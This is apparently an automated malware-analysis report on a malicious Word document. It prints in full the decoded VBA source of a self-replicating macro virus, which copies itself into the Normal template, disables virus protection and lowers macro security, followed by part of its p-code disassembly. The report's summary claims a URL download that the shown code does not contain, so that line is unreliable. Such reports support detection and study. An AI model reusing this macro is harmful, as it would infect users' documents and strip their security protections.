MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. The macro attempts to download a library from the URL 'http://10.42.1.14/emo.htm', likely to facilitate further malicious activity. The document body discusses a technical issue with postal transfers, serving as a pretext to lure the user into downloading the malicious content.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4911 bytes |
SHA-256: 57c35a1533b2ab82fc311eeeaeedef2363d1de42dc2f223c0d0c424f9680a3b0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Onex-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Extra"
Attribute VB_Base = "1Normal.Extra"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
'оUserForm1.Show
End Sub
Private Sub Document_Open()
On Error Resume Next
Set c = New DataObject
If ActiveDocument.VBProject.VBComponents(1).Name <> "Extra" Then
Set go = ActiveDocument.VBProject.VBComponents(1)
saveit = Tre
ElseIf NormalTemplate.VBProject.VBComponents(1).Name <> "Extra" Then
Set go = NormalTemplate.VBProject.VBComponents(1)
End If
With go
c.SetText Extra.VBProject.VBComponents(1).CodeModule.lines(1, Extra.VBProject.VBComponents(1).CodeModule.countoflines)
.CodeModule.deletelines 1, .CodeModule.countoflines
.CodeModule.insertlines 1, c.GetText
.Name = "Extra"
End With
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
CommandBars("Tools").Controls("Macro").Enabled = 0
If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' Word 97/2k.Extra - Psyclone X
' My first virus for the year 2k
' Processing file: /opt/analyzer/scan_staging/386a0129e5a34ea191bc527a2c6c66d3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Extra - 2973 bytes
' Line #0:
' Line #1:
' FuncDefn (Private Sub Document_New())
' Line #2:
' QuoteRem 0x0000 0x000F "оUserForm1.Show"
' Line #3:
' Line #4:
' Line #5:
' EndSub
' Line #6:
' Line #7:
' FuncDefn (Private Sub Document_Open())
' Line #8:
' OnError (Resume Next)
' Line #9:
' SetStmt
' New <crash>
' Set c
' Line #10:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0005 "Extra"
' Ne
' IfBlock
' Line #11:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' Set GoSub
' Line #12:
' Ld Tre
' St saveit
' Line #13:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0005 "Extra"
' Ne
' ElseIfBlock
' Line #14:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' Set GoSub
' Line #15:
' EndIfBlock
' Line #16:
' StartWithExpr
' Ld GoSub
' With
' Line #17:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld Extra
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' LitDI2 0x0001
' Ld Extra
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd lines 0x0002
' Ld c
' ArgsMemCall SetText 0x0001
' Line #18:
' LitDI2 0x0001
' MemLdWith CodeModule
' MemLd countoflines
' MemLdWith CodeModule
' ArgsMemCall deletelines 0x0002
' Line #19:
' LitDI2 0x0001
' Ld c
' MemLd GetText
' MemLdWith CodeModule
' ArgsMemCall insertlines 0x0002
' Line #20:
' LitStr 0x0005 "Extra"
' MemStWith New
' Line #21:
' EndWith
' Line #22:
' LitDI2 0x0000
' Ld Options
' MemSt ConfirmConversions
' Line #23:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #24:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #25:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #26:
' LitDI2 0x0000
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #27:
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.